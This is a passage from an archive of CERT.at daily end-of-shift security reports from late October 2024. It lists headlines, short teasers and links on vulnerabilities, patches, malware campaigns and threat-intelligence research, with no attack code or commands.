polkit, python-single-version, and webkitgtk), Mageia (bind, buildah, podman, skopeo, kernel, kmod-xtables-addons. kmod-virtualbox, kernel-firmware & kernel-firmware-nonfree radeon-firmware, .. --------------------------------------------- https://lwn.net/Articles/996908/ ∗∗∗ WordPress Vulnerability & Patch Roundup October 2024 ∗∗∗ --------------------------------------------- https://blog.sucuri.net/2024/11/wordpress-vulnerability-patch-roundup-octob… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 31.10.2024
by Daily end-of-shift report 31 Oct '24

31 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 30-10-2024 18:00 − Donnerstag 31-10-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ With 2FA Enabled: NPM Package lottie-player Taken Over by Attackers ∗∗∗ --------------------------------------------- On October 30, the community reported existence of malicious code within versions 2.0.5, 2.0.6, and 2.0.7 of the npm package. The package maintainers replied and confirmed the attackers were able to take over the NPM package using a leaked automation token which was used to automate publications of NPM packages. --------------------------------------------- https://checkmarx.com/blog/with-2fa-enabled-npm-package-lottie-player-taken… ∗∗∗ GreyNoise Intelligence Discovers Zero-Day Vulnerabilities in Live Streaming Cameras with the Help of AI ∗∗∗ --------------------------------------------- Affected devices are typically high-cost live streaming cameras, sometimes exceeding several thousand dollars. [..] Affected devices use VHD PTZ camera firmware < 6.3.40 used in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on Hisilicon Hi3516A V600 SoC V60, V61, and V63. These cameras, which feature an embedded web server allowing for direct access by web browser, are reportedly deployed in environments where reliability and privacy are crucial, including: Industrial and manufacturing plants [..] Business conferences [..] Healthcare settings [..] State and local government environments [..] Houses of worship --------------------------------------------- https://www.greynoise.io/blog/greynoise-intelligence-discovers-zero-day-vul… ∗∗∗ Midnight Blizzard conducts large-scale spear-phishing campaign using RDP files ∗∗∗ --------------------------------------------- Microsoft is releasing this blog to notify the public and disrupt this threat actor activity. This blog provides context on these external spear-phishing attempts, which are common attack techniques and do not represent any new compromise of Microsoft. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-… ∗∗∗ Discovering Hidden Vulnerabilities in Portainer with CodeQL ∗∗∗ --------------------------------------------- In this blog, we will show how we used CodeQL to find these vulnerabilities and even wrote custom queries to find a specific vulnerability. --------------------------------------------- https://www.cyberark.com/resources/threat-research-blog/discovering-hidden-… ∗∗∗ Loose-lipped neural networks and lazy scammers ∗∗∗ --------------------------------------------- As large language models improve, their strengths and weaknesses, as well as the tasks they do well or poorly, are becoming better understood. Threat actors are exploring applications of this technology in a range of automation scenarios. But, as we see, they sometimes commit blunders that help shed light on how they use LLMs, at least in the realm of online fraud. --------------------------------------------- https://securelist.com/llm-phish-blunders/114367/ ∗∗∗ Mounting memory with MemProcFS for advanced memory forensics ∗∗∗ --------------------------------------------- Whilst this blog does not intend to go into any detail into some of the most popular tools available to analyse memory, nor a deep dive into analysis techniques it is intended to provide high level information about some significant enhances to memory forensics in the last few years and the difference in tooling. This also covers three memory forensic tools; many others are available. --------------------------------------------- https://www.pentestpartners.com/security-blog/mounting-memory-with-memprocf… ∗∗∗ The Persistent Perimeter Threat: Strategic Insights from a Multi-Year APT Campaign Targeting Edge Devices ∗∗∗ --------------------------------------------- Discover insights from a multi-year APT campaign that exploited network perimeter vulnerabilities to target high-value entities, revealing critical gaps in edge device security. --------------------------------------------- https://www.greynoise.io/blog/the-persistent-perimeter-threat-strategic-ins… ∗∗∗ Auditing K3s Clusters ∗∗∗ --------------------------------------------- K3s shares a great deal with standard Kubernetes, but its lightweight implementation comes with some challenges and opportunities in the security sphere. --------------------------------------------- https://www.nccgroup.com/us/research-blog/auditing-k3s-clusters/ ===================== = Vulnerabilities = ===================== ∗∗∗ LiteSpeed Cache WordPress plugin bug lets hackers get admin access ∗∗∗ --------------------------------------------- The free version of the popular WordPress plugin LiteSpeed Cache has fixed a dangerous privilege elevation flaw on its latest release that could allow unauthenticated site visitors to gain admin rights. [..] The newly discovered high-severity flaw tracked as CVE-2024-50550 is caused by a weak hash check in the plugin's "role simulation" feature, designed to simulate user roles to aid the crawler in site scans from different user levels. --------------------------------------------- https://www.bleepingcomputer.com/news/security/litespeed-cache-wordpress-pl… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (firefox-esr and openssl), Fedora (firefox, libarchive, micropython, NetworkManager-libreswan, and xorg-x11-server-Xwayland), Red Hat (nano), Slackware (mozilla-firefox, mozilla-thunderbird, tigervnc, and xorg), SUSE (389-ds, Botan, go1.21-openssl, govulncheck-vulndb, java-11-openjdk, lxc, python-Werkzeug, and uwsgi), and Ubuntu (firefox, libarchive, linux-azure-fde, linux-azure-fde-5.15, python-pip, and xorg-server, xorg-server-hwe-16.04, xorg-server-hwe-18.04). --------------------------------------------- https://lwn.net/Articles/996526/ ∗∗∗ Drupal: Cookiebot + GTM - Moderately critical - Cross Site Scripting - SA-CONTRIB-2024-055 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-055 ∗∗∗ Bosch: DoS vulnerability on IndraDrive ∗∗∗ --------------------------------------------- https://psirt.bosch.com/security-advisories/bosch-sa-315415.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 30.10.2024
by Daily end-of-shift report 30 Oct '24

30 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 29-10-2024 18:00 − Mittwoch 30-10-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Hackers steal 15,000 cloud credentials from exposed Git config files ∗∗∗ --------------------------------------------- A global large-scale dubbed "EmeraldWhale" exploited misconfigured Git configuration files to steal over 15,000 cloud account credentials from thousands of private repositories. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-steal-15-000-cloud-c… ∗∗∗ Jumpy Pisces Engages in Play Ransomware ∗∗∗ --------------------------------------------- Jumpy Pisces, also known as Andariel and Onyx Sleet, was historically involved in cyberespionage, financial crime and ransomware attacks. [..] We expect their attacks will increasingly target a wide range of victims globally. Network defenders should view Jumpy Pisces activity as a potential precursor to ransomware attacks, not just espionage, underscoring the need for heightened vigilance. --------------------------------------------- https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomwa… ∗∗∗ Writing a BugSleep C2 server and detecting its traffic with Snort ∗∗∗ --------------------------------------------- In June 2024, security researchers published their analysis of a novel implant dubbed “MuddyRot”(aka "BugSleep"). [..] This blog will demonstrate the practice and methodology of reversing BugSleep’s protocol, writing a functional C2 server, and detecting this traffic with Snort. --------------------------------------------- https://blog.talosintelligence.com/writing-a-bugsleep-c2-server/ ∗∗∗ Cryptocurrency Enthusiasts Targeted in Multi-Vector Supply Chain Attack ∗∗∗ --------------------------------------------- Cryptocurrency enthusiasts have been the target of another sophisticated and invasive malware campaign. This campaign was orchestrated through multiple attack vectors, including a malicious Python package named “cryptoaitools” on PyPI and deceptive GitHub repositories. This multi-stage malware, masquerading as a suite of cryptocurrency trading tools, aims to steal a wide range of sensitive data and drain victims’ crypto wallets. --------------------------------------------- https://checkmarx.com/blog/cryptocurrency-enthusiasts-targeted-in-multi-vec… ∗∗∗ New “Scary” FakeCall Malware Captures Photos and OTPs on Android ∗∗∗ --------------------------------------------- A new, more sophisticated variant of the FakeCall malware is targeting Android devices. [..] The FakeCall malware typically infiltrates a device through a malicious app downloaded from a compromised website or a phishing email. The app requests permission to become the default call handler. If granted, the malware gains extensive privileges. --------------------------------------------- https://hackread.com/scary-fakecall-malware-captures-photos-otps-android/ ===================== = Vulnerabilities = ===================== ∗∗∗ Nach Pwn2Own: QNAP und Synology patchen ausgenutzte NAS-Lücken ∗∗∗ --------------------------------------------- Für auf der Pwn2Own ausgenutzte TrueNAS-Lücken scheint es derweil noch keine Patches zu geben – dafür aber Hinweise, wie Nutzer ihre Systeme vor möglichen Angriffen schützen können. [..] Erste Patches gibt es beispielsweise von Synology. Das Unternehmen hat schon am 25. Oktober Updates für Beephotos für Beestation OS 1.0 und 1.1 sowie Synology Photos 1.7 und 1.6 für DSM 7.2 bereitgestellt. Diese schließen jeweils eine kritische Sicherheitslücke, die es Angreifern erlaubt, aus der Ferne Schadcode auszuführen. --------------------------------------------- https://www.golem.de/news/nach-pwn2own-qnap-und-synology-patchen-ausgenutzt… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (buildah), Debian (python-git, texlive-bin, and xorg-server), Mageia (chromium-browser-stable), Red Hat (kernel), SUSE (Botan, go1.22-openssl, go1.23-openssl, grafana, libgsf, pcp, pgadmin4, python310-pytest-html, python313, xorg-x11-server, and xwayland), and Ubuntu (nano, python-urllib3, and xorg-server, xwayland). --------------------------------------------- https://lwn.net/Articles/996310/ ∗∗∗ QNAP: Vulnerability in SMB Service (PWN2OWN 2024) ∗∗∗ --------------------------------------------- https://www.qnap.com/en-us/security-advisory/QSA-24-42 ∗∗∗ SPLUNK: SVD-2024-1015: Third-Party Package Updates in the Splunk Add-on for Cisco Meraki - October 2024 ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1015 ∗∗∗ SPLUNK: SVD-2024-1014: Third-Party Package Updates in the Splunk Add-on for Google Cloud Platform - October 2024 ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1014 ∗∗∗ Ping Identity PingIDM: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/query-filter-injectio… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 29.10.2024
by Daily end-of-shift report 29 Oct '24

29 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Montag 28-10-2024 18:00 − Dienstag 29-10-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ New tool bypasses Google Chrome’s new cookie encryption system ∗∗∗ --------------------------------------------- A researcher has released a tool to bypass Googles new App-Bound encryption cookie-theft defenses and extract saved credentials from the Chrome web browser. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-tool-bypasses-google-chr… ∗∗∗ Exchange Online: Inbound SMTP DANE mit DNSSEC verfügbar ∗∗∗ --------------------------------------------- Microsoft hat das Inbound SMTP DANE mit DNSSEC für Exchange Online allgemein freigegeben, nachdem das Ganze bereits im Juli 2024 als Preview verfügbar war. Mit der neuen Funktion Inbound SMTP DANE with DNSSEC in Exchange Online soll die Sicherheit der E-Mail-Kommunikation durch die Unterstützung zweier Sicherheitsstandards erhöht werden. --------------------------------------------- https://www.borncity.com/blog/2024/10/29/exchange-online-inbound-smtp-dane-… ∗∗∗ Ransomware-Angriffe auf Sonicwall SSL-VPNs ∗∗∗ --------------------------------------------- IT-Forscher haben Attacken auf Sonicwall SSL-VPNs untersucht und dabei Ransomware-Aktivitäten von Akira und Fog entdeckt. [..] Die Sonicwall-Geräte, durch die die Täter einbrechen konnten, waren allesamt nicht gegen die Schwachstelle CVE-2024-40766 gepatcht – mit einem CVSS-Wert von 9.3 gilt sie als kritisches Risiko. Anfang September warnte Sonicwall, dass diese Sicherheitslücke in den SSL-VPNs bereits aktiv angegriffen wird, und wies nochmals auf die verfügbaren Updates hin, die das Sicherheitsleck stopfen. --------------------------------------------- https://heise.de/-9998068 ∗∗∗ New Research Reveals Spectre Vulnerability Persists in Latest AMD and Intel Processors ∗∗∗ --------------------------------------------- More than six years after the Spectre security flaw impacting modern CPU processors came to light, new research has found that the latest AMD and Intel processors are still susceptible to speculative execution attacks. [..] The attack has been described as the first, practical "end-to-end cross-process Spectre leak." --------------------------------------------- https://thehackernews.com/2024/10/new-research-reveals-spectre.html ∗∗∗ What Are My OPTIONS? CyberPanel v2.3.6 pre-auth RCE ∗∗∗ --------------------------------------------- Few months ago I was assigned to do a pentest on a target running CyberPanel. It seemed to be installed by default by some VPS providers & it was also sponsored by Freshworks. [..] if you’re a beginner with a creative mind looking to get started with code review, I definitely recommend you read this blog. --------------------------------------------- https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v2… ∗∗∗ Vorsicht vor dieser Instagram-Nachricht: „Ich brauche deine Hilfe“ ∗∗∗ --------------------------------------------- „Ich brauche deine Hilfe“ schreibt eine bekannte Person oder auch ein Freund oder eine Freundin auf Instagram. Die Person bittet Sie, bei einem Voting für sie abzustimmen und schickt Ihnen einen Link. Vorsicht: Es handelt sich um eine Betrugsmasche! --------------------------------------------- https://www.watchlist-internet.at/news/instagram-nachricht-hilfe/ ===================== = Vulnerabilities = ===================== ∗∗∗ QNAP: Vulnerability in HBS 3 Hybrid Backup Sync (PWN2OWN 2024) ∗∗∗ --------------------------------------------- An OS command injection vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If exploited, the vulnerability could allow remote attackers to execute arbitrary commands. Critical, CVE-2024-50388 --------------------------------------------- https://www.qnap.com/en-us/security-advisory/QSA-24-41 ∗∗∗ Spring: Authorization Bypass of Static Resources in WebFlux Applications ∗∗∗ --------------------------------------------- Spring WebFlux applications that have Spring Security authorization rules on static resources can be bypassed under certain circumstances. CRITICAL, CVE-2024-38821 --------------------------------------------- https://spring.io/security/cve-2024-38821/ ∗∗∗ Auch verfügbar: Updates für iOS 17, macOS 14 und macOS 13 – mit Sicherheitsfixes ∗∗∗ --------------------------------------------- Apple hat neben iOS 18.1, iPadOS 18.1 und macOS 15.1 auch Updates für ältere Betriebssysteme bereitgestellt. Sie beheben nur Sicherheitsprobleme. --------------------------------------------- https://heise.de/-9997116 ∗∗∗ Mozilla Security Advisories October 29, 2024 ∗∗∗ --------------------------------------------- Thunderbird 132, Thunderbird 128.4, Firefox ESR 115.17, Firefox ESR 128.4 and Firefox 132. --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/ ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (exim4) and SUSE (chromium, openssl-1_1, and openssl-3). --------------------------------------------- https://lwn.net/Articles/996196/ ∗∗∗ 0patch: We Patched CVE-2024-38030, Found Another Windows Themes Spoofing Vulnerability (0day) ∗∗∗ --------------------------------------------- https://blog.0patch.com/2024/10/we-patched-cve-2024-38030-found-another.html ∗∗∗ OneDev Security Update Advisory (CVE-2024-45309) ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/84118/ ∗∗∗ Solar-Log Base 15 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-303-02 ∗∗∗ Delta Electronics InfraSuite Device Master ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-303-03 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 28.10.2024
by Daily end-of-shift report 28 Oct '24

28 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 25-10-2024 18:00 − Montag 28-10-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ Amazon seizes domains used in rogue Remote Desktop campaign to steal data ∗∗∗ --------------------------------------------- Amazon has seized domains used by the Russian APT29 hacking group in targeted attacks against government and military organizations to steal Windows credentials and data using malicious Remote Desktop Protocol connection files. --------------------------------------------- https://www.bleepingcomputer.com/news/security/amazon-seizes-domains-used-i… ∗∗∗ Redline, Meta infostealer malware operations seized by police ∗∗∗ --------------------------------------------- The Dutch National Police seized the network infrastructure for the Redline and Meta infostealer malware operations in "Operation Magnus," warning cybercriminals that their data is now in the hands of the law enforcement. --------------------------------------------- https://www.bleepingcomputer.com/news/legal/redline-meta-infostealer-malwar… ∗∗∗ 70 Zero-Day-Lücken ausgenutzt: Pwn2Own-Hacker knacken Samsung Galaxy S24 und mehr ∗∗∗ --------------------------------------------- Bei dem Wettbewerb wurden auch diverse Kameras, Drucker und NAS-Systeme attackiert. An ein Pixel 8 oder iPhone 15 hat sich aber niemand rangetraut. --------------------------------------------- https://www.golem.de/news/70-zero-day-luecken-ausgenutzt-pwn2own-hacker-kna… ∗∗∗ The Windows Registry Adventure #4: Hives and the registry layout ∗∗∗ --------------------------------------------- To a normal user or even a Win32 application developer, the registry layout may seem simple: there are five root keys that we know from Regedit (abbreviated as HKCR, HKLM, HKCU, HKU and HKCC), and each of them contains a nested tree structure that serves a specific role in the system. But as one tries to dig deeper and understand how the registry .. --------------------------------------------- https://googleprojectzero.blogspot.com/2024/10/the-windows-registry-adventu… ∗∗∗ Notorious Hacker Group TeamTNT Launches New Cloud Attacks for Crypto Mining ∗∗∗ --------------------------------------------- The infamous cryptojacking group known as TeamTNT appears to be readying for a new large-scale campaign targeting cloud-native environments for mining cryptocurrencies and renting out breached servers to third-parties."The group is currently .. --------------------------------------------- https://thehackernews.com/2024/10/notorious-hacker-group-teamtnt-launches.h… ∗∗∗ Cybercriminals Pose a Greater Threat of Disruptive US Election Hacks Than Russia or China ∗∗∗ --------------------------------------------- A report distributed by the US Department of Homeland Security warned that financially motivated cybercriminals are more likely to attack US election infrastructure than state-backed hackers. --------------------------------------------- https://www.wired.com/story/cybercriminals-disruptive-hacking-us-elections-… ∗∗∗ Vulnerabilities of Realtek SD card reader driver, part 1 ∗∗∗ --------------------------------------------- These vulnerabilities enable non-privileged users to leak the contents of kernel pool and kernel stack, write to arbitrary kernel memory, and, the most interesting, read and write physical memory from user mode via the DMA capability of the device. The vulnerabilities have remained undisclosed for years, affecting many OEMs, including Dell, .. --------------------------------------------- https://zwclose.github.io/2024/10/14/rtsper1.html ∗∗∗ Inside the Open Directory of the “You Dun” Threat Group ∗∗∗ --------------------------------------------- The DFIR Report’s Threat Intel Team detected an open directory in January 2024 and analyzed it for trade craft and threat actor activity. Once reviewed, we identified it was related to the Chinese speaking hacking group that call themselves “You Dun” .. --------------------------------------------- https://thedfirreport.com/2024/10/28/inside-the-open-directory-of-the-you-d… ∗∗∗ Die NSA empfiehlt wöchentliches Smartphone-Reboot ∗∗∗ --------------------------------------------- Interessante Information, die mir die Woche untergekommen ist. Die US-Sicherheitsbehörde NSA (National Security Agency, Inlandsgeheimdienst) empfiehlt einmal wöchentlich sein Smartphone neu zu starten. Das ganze hat einen sicherheitstechnischen Hintergrund. Durch den Neustart soll Malware, die nicht persistent .. --------------------------------------------- https://www.borncity.com/blog/2024/10/27/die-nsa-empfiehlt-woechentliches-s… ∗∗∗ Anatomy of an LLM RCE ∗∗∗ --------------------------------------------- As large language models (LLMs) become more advanced and are granted additional capabilities by developers, security risks increase dramatically. Manipulated LLMs are no longer just a .. --------------------------------------------- https://www.cyberark.com/resources/threat-research-blog/anatomy-of-an-llm-r… ∗∗∗ Hybrid Russian Espionage and Influence Campaign Aims to Compromise Ukrainian Military Recruits and Deliver Anti-Mobilization Narratives ∗∗∗ --------------------------------------------- In September 2024, Google Threat Intelligence Group (consisting of Google’s Threat Analysis Group (TAG) and Mandiant) discovered UNC5812, a suspected Russian hybrid espionage and influence operation, delivering Windows and Android malware using a Telegram persona named "Civil Defense". "Civil Defense" claims to be a provider of free .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-… ∗∗∗ Secure Coding: Unbefugten Zugriff durch Path Traversal (CWE-22) verhindern ∗∗∗ --------------------------------------------- CWE-22 beschreibt die unsachgemäße Veränderung eines Pfadnamens auf ein eingeschränktes Verzeichnis. Wie lässt sich die Schwachstelle in den Griff bekommen? --------------------------------------------- https://heise.de/-9982270 ∗∗∗ Black Basta-Gruppe nutzt Microsoft Teams-Chatfunktion ∗∗∗ --------------------------------------------- Die als "Black Basta" bekannte Ransomware-Gruppe hat einen neuen Mechanismus entwickelt, der die Chatfunktion von Microsoft Teams zur Kontaktaufnahme ausnutzt. --------------------------------------------- https://heise.de/-9995322 ∗∗∗ Nvidia: Rechteausweitung durch Sicherheitslücken in Grafiktreiber möglich ∗∗∗ --------------------------------------------- Nvidia warnt vor mehreren Sicherheitslücken in den Grafiktreibern, die etwa das Ausweiten der Rechte ermöglichen. Updates stehen bereit. --------------------------------------------- https://heise.de/-9995842 ∗∗∗ Lagebericht 2024: Fast 8 Millionen Mal installierte Malware in Google Play ∗∗∗ --------------------------------------------- IT-Forscher haben die mobile-Malware-Situation der vergangenen 12 Monate untersucht. Mehr als 200 App-Fälschungen lauerten in Google Play. --------------------------------------------- https://heise.de/-9996456 ∗∗∗ VMware Tanzu Spring Security: Umgehung von Autorisierungsregeln möglich ∗∗∗ --------------------------------------------- In VMware Tanzu Spring Security klafft eine kritische Sicherheitslücke, die Angreifern die Umgehung von Autorisierungsregeln ermöglicht. --------------------------------------------- https://heise.de/-9996582 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel, python3.12, and python3.9), Debian (activemq, chromium, libheif, nss, and twisted), Fedora (chromium, dnsdist, dotnet8.0, edk2, glibc, libdigidocpp, mbedtls3.6, NetworkManager-libreswan, oath-toolkit, podman-tui, prometheus-podman-exporter, python-fastapi, python-openapi-core, .. --------------------------------------------- https://lwn.net/Articles/996085/ ∗∗∗ Chatwork Desktop Application (Windows) uses a potentially dangerous function ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN78335885/ ∗∗∗ K000148252: Python tarfile vulnerability CVE-2024-6232 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148252 ∗∗∗ K000148256: libarchive vulnerability CVE-2018-1000880 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148256 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 25.10.2024
by Daily end-of-shift report 25 Oct '24

25 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 24-10-2024 18:00 − Freitag 25-10-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Denial of Service in Cisco ASA & FTD und weitere Cisco Advisories ∗∗∗ --------------------------------------------- Cisco berichtet in einem kürzlich veröffentlichten Advisory, sich "malicious use" einer Denial-of-Service Sicherheitslücke in Cisco Adaptive Security Appliance & Firepower Threat Defense Software Remote Access VPN bewusst zu sein. Berichten nach handelt es sich hierbei aber nicht um gezielte Denial-of-Service Angriffe, sondern um Seiteneffekte von breitgestreuten Brute-Force oder Credential-Spraying Attacken. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/10/denial-of-service-in-cisco-asa-ftd… ∗∗∗ Objektorientiert und weniger redundant: Das BSI stellt den IT-Grundschutz++ vor ∗∗∗ --------------------------------------------- Das BSI hat sich das Ziel gesetzt, den IT-Grundschutz anwenderfreundlicher zu machen. Dafür setzt man auf Maschinenlesbarkeit und eine schlankere Dokumentation. --------------------------------------------- https://heise.de/-9994010 ∗∗∗ AWS Cloud Development Kit Vulnerability Exposes Users to Potential Account Takeover Risks ∗∗∗ --------------------------------------------- Cybersecurity researchers have disclosed a security flaw impacting Amazon Web Services (AWS) Cloud Development Kit (CDK) that could have resulted in an account takeover under specific circumstances. [..] Following responsible disclosure on June 27, 2024, the issue was addressed by the project maintainers in CDK version 2.149.0 released in July. --------------------------------------------- https://thehackernews.com/2024/10/aws-cloud-development-kit-vulnerability.h… ∗∗∗ NotLockBit: ransomware discovery serves as wake-up call for Mac users ∗∗∗ --------------------------------------------- Historically, Mac users havent had to worry about malware as much as their Windows-using cousins. But that doesnt mean that Mac users should be complacent. And the recent discovery of a new malware strain emphasises that the threat - even if much smaller than on Windows - remains real. --------------------------------------------- https://www.tripwire.com/state-of-security/notlockbit-rransomware-discovery… ∗∗∗ Embargo ransomware: Rock’n’Rust ∗∗∗ --------------------------------------------- Novice ransomware group Embargo is testing and deploying a new Rust-based toolkit --------------------------------------------- https://www.welivesecurity.com/en/eset-research/embargo-ransomware-rocknrus… ∗∗∗ From crisis to confidence: How the University of Rijeka used a network breach to reboot their cybersecurity ∗∗∗ --------------------------------------------- How would your institution respond if a seemingly ordinary system check uncovered a major security incident? That’s exactly what the University of Rijeka faced when a member of the IT team discovered an unauthorised virtual machine template during a routine check — just as a new academic year began. --------------------------------------------- https://connect.geant.org/2024/10/25/from-crisis-to-confidence-how-the-univ… ∗∗∗ Moderne Datenkraken: Smart-TVs tracken sogar HDMI-Inhalte ∗∗∗ --------------------------------------------- Smart-TVs werten sogar dann Bildinhalte aus, wenn ein HDMI-Zuspieler genutzt wird. Die Analysen dienen gezielter Werbung. --------------------------------------------- https://heise.de/-9994787 ∗∗∗ Vonovia in der Kritik: Smarte Rauchmelder bergen Risiko der Spionage ∗∗∗ --------------------------------------------- Die Rauchmelder erfassen allerhand Informationen über die Luftqualität und schicken sie durchs Internet - für Kriminelle ein willkommener Datenschatz. [..] Vonovia selbst verarbeitet die Daten angeblich nur in anonymisierter Form. --------------------------------------------- https://www.golem.de/news/vonovia-in-der-kritik-smarte-rauchmelder-bergen-r… ===================== = Vulnerabilities = ===================== NTR -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 24.10.2024
by Daily end-of-shift report 24 Oct '24

24 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 23-10-2024 18:00 − Donnerstag 24-10-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ New Qilin ransomware encryptor features stronger encryption, evasion ∗∗∗ --------------------------------------------- A new Rust-based variant of the Qilin (Agenda) ransomware strain, dubbed Qilin.B, has been spotted in the wild, featuring stronger encryption, better evasion from security tools, and the ability to disrupt data recovery mechanisms. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-qilin-ransomware-encrypt… ∗∗∗ Neue OpenSSL-Lücke ist gefährlich, aber sehr schwer auszunutzen ∗∗∗ --------------------------------------------- Während SuSE und BSI ein hohes Risiko sehen, verweist das OpenSSL-Projekt auf umfangreiche Vorbedingungen eines Exploits. Vorerst kommen keine Updates. [..] Das Risiko der Lücke mit der CVE-ID CVE-2024-9143 schätzten sie als niedrig ein, weil der Fehler schwierig auszunutzen sei. --------------------------------------------- https://heise.de/-9992067 ∗∗∗ Location tracking of phones is out of control. Here’s how to fight back. ∗∗∗ --------------------------------------------- Unique IDs assigned to Android and iOS devices threaten your privacy. Who knew? You likely have never heard of Babel Street or Location X, but chances are good that they know a lot about you and anyone else you know who keeps a phone nearby around the clock. --------------------------------------------- https://arstechnica.com/information-technology/2024/10/phone-tracking-tool-… ∗∗∗ Investigating volatile data with advanced memory forensics tools – part 1 ∗∗∗ --------------------------------------------- In this two post series I want to highlight how memory forensics plays a crucial role in enhancing forensic investigations. Specifically by providing access to volatile data that cannot be retrieved from storage devices like hard drives. --------------------------------------------- https://www.pentestpartners.com/security-blog/investigating-volatile-data-w… ===================== = Vulnerabilities = ===================== ∗∗∗ Kritische Zero-Day Schwachstelle in FortiManager wird aktiv ausgenutzt - Update verfügbar ∗∗∗ --------------------------------------------- In FortiManager wurde eine kritische Sicherheitslücke entdeckt, die bereits aktiv von Angreifern ausgenutzt wird. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer aus der Ferne, beliebigen Code oder Befehle auszuführen. CVE-2024-47575, CVSS Base Score: 9.8 --------------------------------------------- https://www.cert.at/de/warnungen/2024/10/kritische-zero-day-schwachstelle-i… ∗∗∗ Cisco meldet mehr als 35 Sicherheitslücken in Firewall-Produkten ∗∗∗ --------------------------------------------- Ciscos ASA, Firepower und Secure Firewall Management Center weisen teils kritische Sicherheitslücken auf. Mehr als 35 schließen nun verfügbare Updates. [..] Drei der Sicherheitsmeldungen behandeln als kritisches Risiko eingestufte Sicherheitslücken, elf solche mit hohem Risiko, 21 als mittleren Bedrohungsgrad eingestufte Schwachstellen und eine weitere Meldung hat informativen Charakter ohne Risikobewertung. --------------------------------------------- https://heise.de/-9992639 ∗∗∗ Drupal Security Advisories 2024-10-23 ∗∗∗ --------------------------------------------- Drupal released 5 security advisories. (1 Critical, 3 Moderately Critical, 1 Less Critical) --------------------------------------------- https://www.drupal.org/security ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (grafana, NetworkManager-libreswan, python3.11, and python39:3.9 and python39-devel:3.9), Fedora (dotnet6.0, koji, python-fastapi, python-openapi-core, python-platformio, python-starlette, rust-pyo3, rust-pyo3-build-config, rust-pyo3-ffi, rust-pyo3-macros, rust-pyo3-macros-backend, and yarnpkg), Oracle (grafana, kernel, linux-firmware, NetworkManager-libreswan, and python3.11), Slackware (php81), and SUSE (apache2, buildah, cups-filters, go1.21-openssl, podman, postgresql16, python-pyOpenSSL, and webkit2gtk3). --------------------------------------------- https://lwn.net/Articles/995550/ ∗∗∗ VU#123336: Vulnerable WiFi Alliance example code found in Arcadyan FMIMG51AX000J ∗∗∗ --------------------------------------------- https://kb.cert.org/vuls/id/123336 ∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (October 14, 2024 to October 20, 2024) ∗∗∗ --------------------------------------------- https://www.wordfence.com/blog/2024/10/wordfence-intelligence-weekly-wordpr… ∗∗∗ Unauthentifizierte Path Traversal Schwachstelle in Lawo AG vsm LTC Time Sync (vTimeSync) ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/unauthenticated-path-… ∗∗∗ iniNet Solutions SpiderControl SCADA PC HMI Editor ∗∗∗ --------------------------------------------- 